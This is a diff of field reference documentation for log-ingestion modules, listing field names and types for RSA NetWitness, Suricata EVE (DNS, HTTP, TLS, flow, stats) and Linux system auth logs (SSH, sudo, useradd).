+*`suricata.eve.dns.id`*:: + -- -Deprecated - -type: ip +type: long -- -*`rsa.network.faddr`*:: +*`suricata.eve.flow_id`*:: + -- type: keyword -- -*`rsa.network.lhost`*:: + +*`suricata.eve.email.status`*:: + -- type: keyword -- -*`rsa.network.origin`*:: +*`suricata.eve.dest_ip`*:: + -- -type: keyword +type: alias + +alias to: destination.ip -- -*`rsa.network.remote_domain_id`*:: +*`suricata.eve.icmp_code`*:: + -- -type: keyword +type: long -- -*`rsa.network.addr`*:: + +*`suricata.eve.http.status`*:: + -- -type: keyword +type: alias + +alias to: http.response.status_code -- -*`rsa.network.dns_a_record`*:: +*`suricata.eve.http.redirect`*:: + -- type: keyword -- -*`rsa.network.dns_ptr_record`*:: +*`suricata.eve.http.http_user_agent`*:: + -- -type: keyword +type: alias + +alias to: user_agent.original -- -*`rsa.network.fhost`*:: +*`suricata.eve.http.protocol`*:: + -- type: keyword -- -*`rsa.network.fport`*:: +*`suricata.eve.http.http_refer`*:: + -- -type: keyword +type: alias + +alias to: http.request.referrer -- -*`rsa.network.laddr`*:: +*`suricata.eve.http.url`*:: + -- -type: keyword +type: alias + +alias to: url.original -- -*`rsa.network.linterface`*:: +*`suricata.eve.http.hostname`*:: + -- -type: keyword +type: alias + +alias to: url.domain -- -*`rsa.network.phost`*:: +*`suricata.eve.http.length`*:: + -- -type: keyword +type: alias + +alias to: http.response.body.bytes -- -*`rsa.network.ad_computer_dst`*:: +*`suricata.eve.http.http_method`*:: + -- -Deprecated, use host.dst +type: alias -type: keyword +alias to: http.request.method -- -*`rsa.network.eth_type`*:: +*`suricata.eve.http.http_content_type`*:: + -- -This key is used to capture Ethernet Type, Used for Layer 3 Protocols Only +type: keyword -type: long +-- + +*`suricata.eve.in_iface`*:: ++ +-- +type: keyword -- -*`rsa.network.ip_proto`*:: + +*`suricata.eve.alert.metadata`*:: + -- -This key should be used to capture the Protocol number, all the protocol nubers are converted into string in UI +Metadata about the alert. -type: long +type: flattened -- -*`rsa.network.dns_cname_record`*:: +*`suricata.eve.alert.category`*:: + -- type: keyword -- -*`rsa.network.dns_id`*:: +*`suricata.eve.alert.severity`*:: + -- -type: keyword +type: alias + +alias to: event.severity -- -*`rsa.network.dns_opcode`*:: +*`suricata.eve.alert.rev`*:: + -- -type: keyword +type: long -- -*`rsa.network.dns_resp`*:: +*`suricata.eve.alert.gid`*:: + -- -type: keyword +type: long -- -*`rsa.network.dns_type`*:: +*`suricata.eve.alert.signature`*:: + -- type: keyword -- -*`rsa.network.domain1`*:: +*`suricata.eve.alert.action`*:: + -- -type: keyword +type: alias + +alias to: event.outcome -- -*`rsa.network.host_type`*:: +*`suricata.eve.alert.signature_id`*:: + -- -type: keyword +type: long -- -*`rsa.network.packet_length`*:: + + +*`suricata.eve.ssh.client.proto_version`*:: + -- type: keyword -- -*`rsa.network.host_orig`*:: +*`suricata.eve.ssh.client.software_version`*:: + -- -This is used to capture the original hostname in case of a Forwarding Agent or a Proxy in between. - type: keyword -- -*`rsa.network.rpayload`*:: + +*`suricata.eve.ssh.server.proto_version`*:: + -- -This key is used to capture the total number of payload bytes seen in the retransmitted packets. - type: keyword -- -*`rsa.network.vlan_name`*:: +*`suricata.eve.ssh.server.software_version`*:: + -- -This key should only be used to capture the name of the Virtual LAN - type: keyword -- -*`rsa.investigations.ec_activity`*:: + +*`suricata.eve.stats.capture.kernel_packets`*:: + -- -This key captures the particular event activity(Ex:Logoff) - -type: keyword +type: long -- -*`rsa.investigations.ec_theme`*:: +*`suricata.eve.stats.capture.kernel_drops`*:: + -- -This key captures the Theme of a particular Event(Ex:Authentication) - -type: keyword +type: long -- -*`rsa.investigations.ec_subject`*:: +*`suricata.eve.stats.capture.kernel_ifdrops`*:: + -- -This key captures the Subject of a particular Event(Ex:User) - -type: keyword +type: long -- -*`rsa.investigations.ec_outcome`*:: +*`suricata.eve.stats.uptime`*:: + -- -This key captures the outcome of a particular Event(Ex:Success) - -type: keyword +type: long -- -*`rsa.investigations.event_cat`*:: + +*`suricata.eve.stats.detect.alert`*:: + -- -This key captures the Event category number - type: long -- -*`rsa.investigations.event_cat_name`*:: + +*`suricata.eve.stats.http.memcap`*:: + -- -This key captures the event category name corresponding to the event cat code - -type: keyword +type: long -- -*`rsa.investigations.event_vcat`*:: +*`suricata.eve.stats.http.memuse`*:: + -- -This is a vendor supplied category. This should be used in situations where the vendor has adopted their own event_category taxonomy. - -type: keyword +type: long -- -*`rsa.investigations.analysis_file`*:: + +*`suricata.eve.stats.file_store.open_files`*:: + -- -This is used to capture all indicators used in a File Analysis. This key should be used to capture an analysis of a file - -type: keyword +type: long -- -*`rsa.investigations.analysis_service`*:: + +*`suricata.eve.stats.defrag.max_frag_hits`*:: + -- -This is used to capture all indicators used in a Service Analysis. This key should be used to capture an analysis of a service - -type: keyword +type: long -- -*`rsa.investigations.analysis_session`*:: + +*`suricata.eve.stats.defrag.ipv4.timeouts`*:: + -- -This is used to capture all indicators used for a Session Analysis. This key should be used to capture an analysis of a session - -type: keyword +type: long -- -*`rsa.investigations.boc`*:: +*`suricata.eve.stats.defrag.ipv4.fragments`*:: + -- -This is used to capture behaviour of compromise - -type: keyword +type: long -- -*`rsa.investigations.eoc`*:: +*`suricata.eve.stats.defrag.ipv4.reassembled`*:: + -- -This is used to capture Enablers of Compromise - -type: keyword +type: long -- -*`rsa.investigations.inv_category`*:: + +*`suricata.eve.stats.defrag.ipv6.timeouts`*:: + -- -This used to capture investigation category - -type: keyword +type: long -- -*`rsa.investigations.inv_context`*:: +*`suricata.eve.stats.defrag.ipv6.fragments`*:: + -- -This used to capture investigation context - -type: keyword +type: long -- -*`rsa.investigations.ioc`*:: +*`suricata.eve.stats.defrag.ipv6.reassembled`*:: + -- -This is key capture indicator of compromise - -type: keyword +type: long -- -*`rsa.counters.dclass_c1`*:: +*`suricata.eve.stats.flow.tcp_reuse`*:: + -- -This is a generic counter key that should be used with the label dclass.c1.str only - type: long -- -*`rsa.counters.dclass_c2`*:: +*`suricata.eve.stats.flow.udp`*:: + -- -This is a generic counter key that should be used with the label dclass.c2.str only - type: long -- -*`rsa.counters.event_counter`*:: +*`suricata.eve.stats.flow.memcap`*:: + -- -This is used to capture the number of times an event repeated - type: long -- -*`rsa.counters.dclass_r1`*:: +*`suricata.eve.stats.flow.emerg_mode_entered`*:: + -- -This is a generic ratio key that should be used with the label dclass.r1.str only - -type: keyword +type: long -- -*`rsa.counters.dclass_c3`*:: +*`suricata.eve.stats.flow.emerg_mode_over`*:: + -- -This is a generic counter key that should be used with the label dclass.c3.str only - type: long -- -*`rsa.counters.dclass_c1_str`*:: +*`suricata.eve.stats.flow.tcp`*:: + -- -This is a generic counter string key that should be used with the label dclass.c1 only - -type: keyword +type: long -- -*`rsa.counters.dclass_c2_str`*:: +*`suricata.eve.stats.flow.icmpv6`*:: + -- -This is a generic counter string key that should be used with the label dclass.c2 only - -type: keyword +type: long -- -*`rsa.counters.dclass_r1_str`*:: +*`suricata.eve.stats.flow.icmpv4`*:: + -- -This is a generic ratio string key that should be used with the label dclass.r1 only - -type: keyword +type: long -- -*`rsa.counters.dclass_r2`*:: +*`suricata.eve.stats.flow.spare`*:: + -- -This is a generic ratio key that should be used with the label dclass.r2.str only - -type: keyword +type: long -- -*`rsa.counters.dclass_c3_str`*:: +*`suricata.eve.stats.flow.memuse`*:: + -- -This is a generic counter string key that should be used with the label dclass.c3 only - -type: keyword +type: long -- -*`rsa.counters.dclass_r3`*:: + +*`suricata.eve.stats.tcp.pseudo_failed`*:: + -- -This is a generic ratio key that should be used with the label dclass.r3.str only - -type: keyword +type: long -- -*`rsa.counters.dclass_r2_str`*:: +*`suricata.eve.stats.tcp.ssn_memcap_drop`*:: + -- -This is a generic ratio string key that should be used with the label dclass.r2 only - -type: keyword +type: long -- -*`rsa.counters.dclass_r3_str`*:: +*`suricata.eve.stats.tcp.insert_data_overlap_fail`*:: + -- -This is a generic ratio string key that should be used with the label dclass.r3 only +type: long -type: keyword +-- +*`suricata.eve.stats.tcp.sessions`*:: ++ -- +type: long +-- -*`rsa.identity.auth_method`*:: +*`suricata.eve.stats.tcp.pseudo`*:: + -- -This key is used to capture authentication methods used only - -type: keyword +type: long -- -*`rsa.identity.user_role`*:: +*`suricata.eve.stats.tcp.synack`*:: + -- -This key is used to capture the Role of a user only - -type: keyword +type: long -- -*`rsa.identity.dn`*:: +*`suricata.eve.stats.tcp.insert_data_normal_fail`*:: + -- -X.500 (LDAP) Distinguished Name - -type: keyword +type: long -- -*`rsa.identity.logon_type`*:: +*`suricata.eve.stats.tcp.syn`*:: + -- -This key is used to capture the type of logon method used. - -type: keyword +type: long -- -*`rsa.identity.profile`*:: +*`suricata.eve.stats.tcp.memuse`*:: + -- -This key is used to capture the user profile - -type: keyword +type: long -- -*`rsa.identity.accesses`*:: +*`suricata.eve.stats.tcp.invalid_checksum`*:: + -- -This key is used to capture actual privileges used in accessing an object - -type: keyword +type: long -- -*`rsa.identity.realm`*:: +*`suricata.eve.stats.tcp.segment_memcap_drop`*:: + -- -Radius realm or similar grouping of accounts - -type: keyword +type: long -- -*`rsa.identity.user_sid_dst`*:: +*`suricata.eve.stats.tcp.overlap`*:: + -- -This key captures Destination User Session ID - -type: keyword +type: long -- -*`rsa.identity.dn_src`*:: +*`suricata.eve.stats.tcp.insert_list_fail`*:: + -- -An X.500 (LDAP) Distinguished name that is used in a context that indicates a Source dn - -type: keyword +type: long -- -*`rsa.identity.org`*:: +*`suricata.eve.stats.tcp.rst`*:: + -- -This key captures the User organization - -type: keyword +type: long -- -*`rsa.identity.dn_dst`*:: +*`suricata.eve.stats.tcp.stream_depth_reached`*:: + -- -An X.500 (LDAP) Distinguished name that used in a context that indicates a Destination dn - -type: keyword +type: long -- -*`rsa.identity.firstname`*:: +*`suricata.eve.stats.tcp.reassembly_memuse`*:: + -- -This key is for First Names only, this is used for Healthcare predominantly to capture Patients information - -type: keyword +type: long -- -*`rsa.identity.lastname`*:: +*`suricata.eve.stats.tcp.reassembly_gap`*:: + -- -This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information - -type: keyword +type: long -- -*`rsa.identity.user_dept`*:: +*`suricata.eve.stats.tcp.overlap_diff_data`*:: + -- -User's Department Names only - -type: keyword +type: long -- -*`rsa.identity.user_sid_src`*:: +*`suricata.eve.stats.tcp.no_flow`*:: + -- -This key captures Source User Session ID - -type: keyword +type: long -- -*`rsa.identity.federated_sp`*:: + +*`suricata.eve.stats.decoder.avg_pkt_size`*:: + -- -This key is the Federated Service Provider. This is the application requesting authentication. - -type: keyword +type: long -- -*`rsa.identity.federated_idp`*:: +*`suricata.eve.stats.decoder.bytes`*:: + -- -This key is the federated Identity Provider. This is the server providing the authentication. - -type: keyword +type: long -- -*`rsa.identity.logon_type_desc`*:: +*`suricata.eve.stats.decoder.tcp`*:: + -- -This key is used to capture the textual description of an integer logon type as stored in the meta key 'logon.type'. - -type: keyword +type: long -- -*`rsa.identity.middlename`*:: +*`suricata.eve.stats.decoder.raw`*:: + -- -This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information - -type: keyword +type: long -- -*`rsa.identity.password`*:: +*`suricata.eve.stats.decoder.ppp`*:: + -- -This key is for Passwords seen in any session, plain text or encrypted - -type: keyword +type: long -- -*`rsa.identity.host_role`*:: +*`suricata.eve.stats.decoder.vlan_qinq`*:: + -- -This key should only be used to capture the role of a Host Machine - -type: keyword +type: long -- -*`rsa.identity.ldap`*:: +*`suricata.eve.stats.decoder.null`*:: + -- -This key is for Uninterpreted LDAP values. Ldap Values that don’t have a clear query or response context - -type: keyword +type: long -- -*`rsa.identity.ldap_query`*:: + +*`suricata.eve.stats.decoder.ltnull.unsupported_type`*:: + -- -This key is the Search criteria from an LDAP search - -type: keyword +type: long -- -*`rsa.identity.ldap_response`*:: +*`suricata.eve.stats.decoder.ltnull.pkt_too_small`*:: + -- -This key is to capture Results from an LDAP search - -type: keyword +type: long -- -*`rsa.identity.owner`*:: +*`suricata.eve.stats.decoder.invalid`*:: + -- -This is used to capture username the process or service is running as, the author of the task - -type: keyword +type: long -- -*`rsa.identity.service_account`*:: +*`suricata.eve.stats.decoder.gre`*:: + -- -This key is a windows specific key, used for capturing name of the account a service (referenced in the event) is running under. Legacy Usage +type: long -type: keyword +-- +*`suricata.eve.stats.decoder.ipv4`*:: ++ -- +type: long +-- -*`rsa.email.email_dst`*:: +*`suricata.eve.stats.decoder.ipv6`*:: + -- -This key is used to capture the Destination email address only, when the destination context is not clear use email - -type: keyword +type: long -- -*`rsa.email.email_src`*:: +*`suricata.eve.stats.decoder.pkts`*:: + -- -This key is used to capture the source email address only, when the source context is not clear use email - -type: keyword +type: long -- -*`rsa.email.subject`*:: +*`suricata.eve.stats.decoder.ipv6_in_ipv6`*:: + -- -This key is used to capture the subject string from an Email only. - -type: keyword +type: long -- -*`rsa.email.email`*:: + +*`suricata.eve.stats.decoder.ipraw.invalid_ip_version`*:: + -- -This key is used to capture a generic email address where the source or destination context is not clear - -type: keyword +type: long -- -*`rsa.email.trans_from`*:: +*`suricata.eve.stats.decoder.pppoe`*:: + -- -Deprecated key defined only in table map. - -type: keyword +type: long -- -*`rsa.email.trans_to`*:: +*`suricata.eve.stats.decoder.udp`*:: + -- -Deprecated key defined only in table map. - -type: keyword +type: long -- -*`rsa.file.privilege`*:: +*`suricata.eve.stats.decoder.dce.pkt_too_small`*:: + -- -Deprecated, use permissions - -type: keyword +type: long -- -*`rsa.file.attachment`*:: +*`suricata.eve.stats.decoder.vlan`*:: + -- -This key captures the attachment file name - -type: keyword +type: long -- -*`rsa.file.filesystem`*:: +*`suricata.eve.stats.decoder.sctp`*:: + -- -type: keyword +type: long -- -*`rsa.file.binary`*:: +*`suricata.eve.stats.decoder.max_pkt_size`*:: + -- -Deprecated key defined only in table map. - -type: keyword +type: long -- -*`rsa.file.filename_dst`*:: +*`suricata.eve.stats.decoder.teredo`*:: + -- -This is used to capture name of the file targeted by the action - -type: keyword +type: long -- -*`rsa.file.filename_src`*:: +*`suricata.eve.stats.decoder.mpls`*:: + -- -This is used to capture name of the parent filename, the file which performed the action - -type: keyword +type: long -- -*`rsa.file.filename_tmp`*:: +*`suricata.eve.stats.decoder.sll`*:: + -- -type: keyword +type: long -- -*`rsa.file.directory_dst`*:: +*`suricata.eve.stats.decoder.icmpv6`*:: + -- -This key is used to capture the directory of the target process or file - -type: keyword +type: long -- -*`rsa.file.directory_src`*:: +*`suricata.eve.stats.decoder.icmpv4`*:: + -- -This key is used to capture the directory of the source process or file - -type: keyword +type: long -- -*`rsa.file.file_entropy`*:: +*`suricata.eve.stats.decoder.erspan`*:: + -- -This is used to capture entropy vale of a file - -type: double +type: long -- -*`rsa.file.file_vendor`*:: +*`suricata.eve.stats.decoder.ethernet`*:: + -- -This is used to capture Company name of file located in version_info - -type: keyword +type: long -- -*`rsa.file.task_name`*:: +*`suricata.eve.stats.decoder.ipv4_in_ipv6`*:: + -- -This is used to capture name of the task +type: long -type: keyword +-- + +*`suricata.eve.stats.decoder.ieee8021ah`*:: ++ +-- +type: long -- -*`rsa.web.fqdn`*:: +*`suricata.eve.stats.dns.memcap_global`*:: + -- -Fully Qualified Domain Names - -type: keyword +type: long -- -*`rsa.web.web_cookie`*:: +*`suricata.eve.stats.dns.memcap_state`*:: + -- -This key is used to capture the Web cookies specifically. - -type: keyword +type: long -- -*`rsa.web.alias_host`*:: +*`suricata.eve.stats.dns.memuse`*:: + -- -type: keyword +type: long -- -*`rsa.web.reputation_num`*:: + +*`suricata.eve.stats.flow_mgr.rows_busy`*:: + -- -Reputation Number of an entity. Typically used for Web Domains - -type: double +type: long -- -*`rsa.web.web_ref_domain`*:: +*`suricata.eve.stats.flow_mgr.flows_timeout`*:: + -- -Web referer's domain - -type: keyword +type: long -- -*`rsa.web.web_ref_query`*:: +*`suricata.eve.stats.flow_mgr.flows_notimeout`*:: + -- -This key captures Web referer's query portion of the URL - -type: keyword +type: long -- -*`rsa.web.remote_domain`*:: +*`suricata.eve.stats.flow_mgr.rows_skipped`*:: + -- -type: keyword +type: long -- -*`rsa.web.web_ref_page`*:: +*`suricata.eve.stats.flow_mgr.closed_pruned`*:: + -- -This key captures Web referer's page information - -type: keyword +type: long -- -*`rsa.web.web_ref_root`*:: +*`suricata.eve.stats.flow_mgr.new_pruned`*:: + -- -Web referer's root URL path - -type: keyword +type: long -- -*`rsa.web.cn_asn_dst`*:: +*`suricata.eve.stats.flow_mgr.flows_removed`*:: + -- -type: keyword +type: long -- -*`rsa.web.cn_rpackets`*:: +*`suricata.eve.stats.flow_mgr.bypassed_pruned`*:: + -- -type: keyword +type: long -- -*`rsa.web.urlpage`*:: +*`suricata.eve.stats.flow_mgr.est_pruned`*:: + -- -type: keyword +type: long -- -*`rsa.web.urlroot`*:: +*`suricata.eve.stats.flow_mgr.flows_timeout_inuse`*:: + -- -type: keyword +type: long -- -*`rsa.web.p_url`*:: +*`suricata.eve.stats.flow_mgr.flows_checked`*:: + -- -type: keyword +type: long -- -*`rsa.web.p_user_agent`*:: +*`suricata.eve.stats.flow_mgr.rows_maxlen`*:: + -- -type: keyword +type: long -- -*`rsa.web.p_web_cookie`*:: +*`suricata.eve.stats.flow_mgr.rows_checked`*:: + -- -type: keyword +type: long -- -*`rsa.web.p_web_method`*:: +*`suricata.eve.stats.flow_mgr.rows_empty`*:: + -- -type: keyword +type: long -- -*`rsa.web.p_web_referer`*:: + + +*`suricata.eve.stats.app_layer.flow.tls`*:: + -- -type: keyword +type: long -- -*`rsa.web.web_extension_tmp`*:: +*`suricata.eve.stats.app_layer.flow.ftp`*:: + -- -type: keyword +type: long -- -*`rsa.web.web_page`*:: +*`suricata.eve.stats.app_layer.flow.http`*:: + -- -type: keyword +type: long -- - -*`rsa.threat.threat_category`*:: +*`suricata.eve.stats.app_layer.flow.failed_udp`*:: + -- -This key captures Threat Name/Threat Category/Categorization of alert - -type: keyword +type: long -- -*`rsa.threat.threat_desc`*:: +*`suricata.eve.stats.app_layer.flow.dns_udp`*:: + -- -This key is used to capture the threat description from the session directly or inferred - -type: keyword +type: long -- -*`rsa.threat.alert`*:: +*`suricata.eve.stats.app_layer.flow.dns_tcp`*:: + -- -This key is used to capture name of the alert - -type: keyword +type: long -- -*`rsa.threat.threat_source`*:: +*`suricata.eve.stats.app_layer.flow.smtp`*:: + -- -This key is used to capture source of the threat +type: long -type: keyword +-- +*`suricata.eve.stats.app_layer.flow.failed_tcp`*:: ++ -- +type: long +-- -*`rsa.crypto.crypto`*:: +*`suricata.eve.stats.app_layer.flow.msn`*:: + -- -This key is used to capture the Encryption Type or Encryption Key only - -type: keyword +type: long -- -*`rsa.crypto.cipher_src`*:: +*`suricata.eve.stats.app_layer.flow.ssh`*:: + -- -This key is for Source (Client) Cipher - -type: keyword +type: long -- -*`rsa.crypto.cert_subject`*:: +*`suricata.eve.stats.app_layer.flow.imap`*:: + -- -This key is used to capture the Certificate organization only - -type: keyword +type: long -- -*`rsa.crypto.peer`*:: +*`suricata.eve.stats.app_layer.flow.dcerpc_udp`*:: + -- -This key is for Encryption peer's IP Address - -type: keyword +type: long -- -*`rsa.crypto.cipher_size_src`*:: +*`suricata.eve.stats.app_layer.flow.dcerpc_tcp`*:: + -- -This key captures Source (Client) Cipher Size - type: long -- -*`rsa.crypto.ike`*:: +*`suricata.eve.stats.app_layer.flow.smb`*:: + -- -IKE negotiation phase. - -type: keyword +type: long -- -*`rsa.crypto.scheme`*:: + +*`suricata.eve.stats.app_layer.tx.tls`*:: + -- -This key captures the Encryption scheme used - -type: keyword +type: long -- -*`rsa.crypto.peer_id`*:: +*`suricata.eve.stats.app_layer.tx.ftp`*:: + -- -This key is for Encryption peer’s identity - -type: keyword +type: long -- -*`rsa.crypto.sig_type`*:: +*`suricata.eve.stats.app_layer.tx.http`*:: + -- -This key captures the Signature Type - -type: keyword +type: long -- -*`rsa.crypto.cert_issuer`*:: +*`suricata.eve.stats.app_layer.tx.dns_udp`*:: + -- -type: keyword +type: long -- -*`rsa.crypto.cert_host_name`*:: +*`suricata.eve.stats.app_layer.tx.dns_tcp`*:: + -- -Deprecated key defined only in table map. - -type: keyword +type: long -- -*`rsa.crypto.cert_error`*:: +*`suricata.eve.stats.app_layer.tx.smtp`*:: + -- -This key captures the Certificate Error String - -type: keyword +type: long -- -*`rsa.crypto.cipher_dst`*:: +*`suricata.eve.stats.app_layer.tx.ssh`*:: + -- -This key is for Destination (Server) Cipher - -type: keyword +type: long -- -*`rsa.crypto.cipher_size_dst`*:: +*`suricata.eve.stats.app_layer.tx.dcerpc_udp`*:: + -- -This key captures Destination (Server) Cipher Size - type: long -- -*`rsa.crypto.ssl_ver_src`*:: +*`suricata.eve.stats.app_layer.tx.dcerpc_tcp`*:: + -- -Deprecated, use version - -type: keyword +type: long -- -*`rsa.crypto.d_certauth`*:: +*`suricata.eve.stats.app_layer.tx.smb`*:: + -- -type: keyword +type: long -- -*`rsa.crypto.s_certauth`*:: + +*`suricata.eve.tls.notbefore`*:: + -- -type: keyword +type: date -- -*`rsa.crypto.ike_cookie1`*:: +*`suricata.eve.tls.issuerdn`*:: + -- -ID of the negotiation — sent for ISAKMP Phase One - type: keyword -- -*`rsa.crypto.ike_cookie2`*:: +*`suricata.eve.tls.sni`*:: + -- -ID of the negotiation — sent for ISAKMP Phase Two - type: keyword -- -*`rsa.crypto.cert_checksum`*:: +*`suricata.eve.tls.version`*:: + -- type: keyword -- -*`rsa.crypto.cert_host_cat`*:: +*`suricata.eve.tls.session_resumed`*:: + -- -This key is used for the hostname category value of a certificate - -type: keyword +type: boolean -- -*`rsa.crypto.cert_serial`*:: +*`suricata.eve.tls.fingerprint`*:: + -- -This key is used to capture the Certificate serial number only - type: keyword -- -*`rsa.crypto.cert_status`*:: +*`suricata.eve.tls.serial`*:: + -- -This key captures Certificate validation status - type: keyword -- -*`rsa.crypto.ssl_ver_dst`*:: +*`suricata.eve.tls.notafter`*:: + -- -Deprecated, use version - -type: keyword +type: date -- -*`rsa.crypto.cert_keysize`*:: +*`suricata.eve.tls.subject`*:: + -- type: keyword -- -*`rsa.crypto.cert_username`*:: + +*`suricata.eve.tls.ja3s.string`*:: + -- type: keyword -- -*`rsa.crypto.https_insact`*:: +*`suricata.eve.tls.ja3s.hash`*:: + -- type: keyword -- -*`rsa.crypto.https_valid`*:: + +*`suricata.eve.tls.ja3.string`*:: + -- type: keyword -- -*`rsa.crypto.cert_ca`*:: +*`suricata.eve.tls.ja3.hash`*:: + -- -This key is used to capture the Certificate signing authority only - type: keyword -- -*`rsa.crypto.cert_common`*:: +*`suricata.eve.app_proto_ts`*:: + -- -This key is used to capture the Certificate common name only - type: keyword -- -*`rsa.wireless.wlan_ssid`*:: +*`suricata.eve.flow.bytes_toclient`*:: + -- -This key is used to capture the ssid of a Wireless Session +type: alias -type: keyword +alias to: destination.bytes -- -*`rsa.wireless.access_point`*:: +*`suricata.eve.flow.start`*:: + -- -This key is used to capture the access point name. +type: alias -type: keyword +alias to: event.start -- -*`rsa.wireless.wlan_channel`*:: +*`suricata.eve.flow.pkts_toclient`*:: + -- -This is used to capture the channel names +type: alias -type: long +alias to: destination.packets -- -*`rsa.wireless.wlan_name`*:: +*`suricata.eve.flow.age`*:: + -- -This key captures either WLAN number/name - -type: keyword +type: long -- - -*`rsa.storage.disk_volume`*:: +*`suricata.eve.flow.state`*:: + -- -A unique name assigned to logical units (volumes) within a physical disk - type: keyword -- -*`rsa.storage.lun`*:: +*`suricata.eve.flow.bytes_toserver`*:: + -- -Logical Unit Number.This key is a very useful concept in Storage. +type: alias -type: keyword +alias to: source.bytes -- -*`rsa.storage.pwwn`*:: +*`suricata.eve.flow.reason`*:: + -- -This uniquely identifies a port on a HBA. - type: keyword -- - -*`rsa.physical.org_dst`*:: +*`suricata.eve.flow.pkts_toserver`*:: + -- -This is used to capture the destination organization based on the GEOPIP Maxmind database. +type: alias -type: keyword +alias to: source.packets -- -*`rsa.physical.org_src`*:: +*`suricata.eve.flow.alerted`*:: + -- -This is used to capture the source organization based on the GEOPIP Maxmind database. - -type: keyword +type: boolean -- - -*`rsa.healthcare.patient_fname`*:: +*`suricata.eve.app_proto`*:: + -- -This key is for First Names only, this is used for Healthcare predominantly to capture Patients information +type: alias -type: keyword +alias to: network.protocol -- -*`rsa.healthcare.patient_id`*:: +*`suricata.eve.tx_id`*:: + -- -This key captures the unique ID for a patient - -type: keyword +type: long -- -*`rsa.healthcare.patient_lname`*:: +*`suricata.eve.app_proto_tc`*:: + -- -This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information - type: keyword -- -*`rsa.healthcare.patient_mname`*:: + +*`suricata.eve.smtp.rcpt_to`*:: + -- -This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information - type: keyword -- - -*`rsa.endpoint.host_state`*:: +*`suricata.eve.smtp.mail_from`*:: + -- -This key is used to capture the current state of the machine, such as blacklisted, infected, firewall disabled and so on - type: keyword -- -*`rsa.endpoint.registry_key`*:: +*`suricata.eve.smtp.helo`*:: + -- -This key captures the path to the registry key - type: keyword -- -*`rsa.endpoint.registry_value`*:: +*`suricata.eve.app_proto_expected`*:: + -- -This key captures values or decorators used within a registry entry - type: keyword -- -[[exported-fields-suricata]] -== Suricata fields +[[exported-fields-system]] +== System fields -Module for handling the EVE JSON logs produced by Suricata. +Module for parsing system log files. [float] -=== suricata +=== system -Fields from the Suricata EVE log file. +Fields from the system log files. [float] -=== eve +=== auth -Fields exported by the EVE JSON logs +Fields from the Linux authorization logs. -*`suricata.eve.event_type`*:: +*`system.auth.timestamp`*:: + -- -type: keyword - --- +type: alias -*`suricata.eve.app_proto_orig`*:: -+ --- -type: keyword +alias to: @timestamp -- - -*`suricata.eve.tcp.tcp_flags`*:: +*`system.auth.hostname`*:: + -- -type: keyword - --- +type: alias -*`suricata.eve.tcp.psh`*:: -+ --- -type: boolean +alias to: host.hostname -- -*`suricata.eve.tcp.tcp_flags_tc`*:: +*`system.auth.program`*:: + -- -type: keyword - --- +type: alias -*`suricata.eve.tcp.ack`*:: -+ --- -type: boolean +alias to: process.name -- -*`suricata.eve.tcp.syn`*:: +*`system.auth.pid`*:: + -- -type: boolean - --- +type: alias -*`suricata.eve.tcp.state`*:: -+ --- -type: keyword +alias to: process.pid -- -*`suricata.eve.tcp.tcp_flags_ts`*:: +*`system.auth.message`*:: + -- -type: keyword - --- +type: alias -*`suricata.eve.tcp.rst`*:: -+ --- -type: boolean +alias to: message -- -*`suricata.eve.tcp.fin`*:: +*`system.auth.user`*:: + -- -type: boolean - --- +type: alias +alias to: user.name -*`suricata.eve.fileinfo.sha1`*:: -+ -- -type: keyword --- -*`suricata.eve.fileinfo.filename`*:: +*`system.auth.ssh.method`*:: + -- -type: alias +The SSH authentication method. Can be one of "password" or "publickey". -alias to: file.path -- -*`suricata.eve.fileinfo.tx_id`*:: +*`system.auth.ssh.signature`*:: + -- -type: long +The signature of the client public key. + -- -*`suricata.eve.fileinfo.state`*:: +*`system.auth.ssh.dropped_ip`*:: + -- -type: keyword +The client IP from SSH connections that are open and immediately dropped. --- -*`suricata.eve.fileinfo.stored`*:: -+ --- -type: boolean +type: ip -- -*`suricata.eve.fileinfo.gaps`*:: +*`system.auth.ssh.event`*:: + -- -type: boolean +The SSH event as found in the logs (Accepted, Invalid, Failed, etc.) --- -*`suricata.eve.fileinfo.sha256`*:: -+ --- -type: keyword +example: Accepted -- -*`suricata.eve.fileinfo.md5`*:: +*`system.auth.ssh.ip`*:: + -- -type: keyword +type: alias + +alias to: source.ip -- -*`suricata.eve.fileinfo.size`*:: +*`system.auth.ssh.port`*:: + -- type: alias -alias to: file.size +alias to: source.port -- -*`suricata.eve.icmp_type`*:: + +*`system.auth.ssh.geoip.continent_name`*:: + -- -type: long +type: alias + +alias to: source.geo.continent_name -- -*`suricata.eve.dest_port`*:: +*`system.auth.ssh.geoip.country_iso_code`*:: + -- type: alias -alias to: destination.port +alias to: source.geo.country_iso_code -- -*`suricata.eve.src_port`*:: +*`system.auth.ssh.geoip.location`*:: + -- type: alias -alias to: source.port +alias to: source.geo.location -- -*`suricata.eve.proto`*:: +*`system.auth.ssh.geoip.region_name`*:: + -- type: alias -alias to: network.transport +alias to: source.geo.region_name -- -*`suricata.eve.pcap_cnt`*:: +*`system.auth.ssh.geoip.city_name`*:: + -- -type: long +type: alias + +alias to: source.geo.city_name -- -*`suricata.eve.src_ip`*:: +*`system.auth.ssh.geoip.region_iso_code`*:: + -- type: alias -alias to: source.ip +alias to: source.geo.region_iso_code -- +[float] +=== sudo -*`suricata.eve.dns.type`*:: -+ --- -type: keyword +Fields specific to events created by the `sudo` command. --- -*`suricata.eve.dns.rrtype`*:: + +*`system.auth.sudo.error`*:: + -- -type: keyword +The error message in case the sudo command failed. --- -*`suricata.eve.dns.rrname`*:: -+ --- -type: keyword +example: user NOT in sudoers -- -*`suricata.eve.dns.rdata`*:: +*`system.auth.sudo.tty`*:: + -- -type: keyword +The TTY where the sudo command is executed. + -- -*`suricata.eve.dns.tx_id`*:: +*`system.auth.sudo.pwd`*:: + -- -type: long +The current directory where the sudo command is executed. + -- -*`suricata.eve.dns.ttl`*:: +*`system.auth.sudo.user`*:: + -- -type: long +The target user to which the sudo command is switching. --- -*`suricata.eve.dns.rcode`*:: -+ --- -type: keyword +example: root -- -*`suricata.eve.dns.id`*:: +*`system.auth.sudo.command`*:: + -- -type: long +The command executed via sudo. --- -*`suricata.eve.flow_id`*:: -+ -- -type: keyword --- +[float] +=== useradd +Fields specific to events created by the `useradd` command. -*`suricata.eve.email.status`*:: -+ --- -type: keyword --- -*`suricata.eve.dest_ip`*:: +*`system.auth.useradd.home`*:: + -- 